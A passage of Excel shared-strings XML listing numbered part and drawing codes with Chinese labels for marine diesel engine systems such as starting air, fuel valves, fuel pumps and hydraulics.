      <t xml:space="preserve">3472-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统，空气瓶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3472-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3472-0250  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3472-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3472-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3472-0900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气安全帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>35db</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀高温水出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀高温水进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通考克</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通球阀，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>41</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4240-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4245-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4245-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油说明</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4245-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4245-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>残留油标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机燃油管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油分离</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心流量速率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0125 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油预热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4255-0126 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统，淡水清洁器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀杆导块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀杆导块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力加压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力加压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力加压泵顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力加压泵顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0700 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力加压泵吸收阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0701 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油压力加压泵吸收阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0800 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0801 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-0901 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1001 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵吸收阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵吸收阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵提升机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵提升机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1600 VIT </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4265-1601 VIT </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0010 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0210 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀喷嘴工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0220 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀调试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0230 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀检查工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0241 VOC </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0251 VOC </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适配器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0801 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0811 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0821 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0831 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵套筒工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-0900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵顶盖工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-1101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵吸油阀工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4270-1201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵泄放阀工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0010 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0020 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0031 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统，旁通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油加压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-0900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压液压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4272-1300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>43+92</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>44+46</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4510-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4540-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水力</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4545-0100 ME-B Eng.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4545-0151 ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4546-0610 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气时间单元</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>4555-0100  HPS/ELFI/ELVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
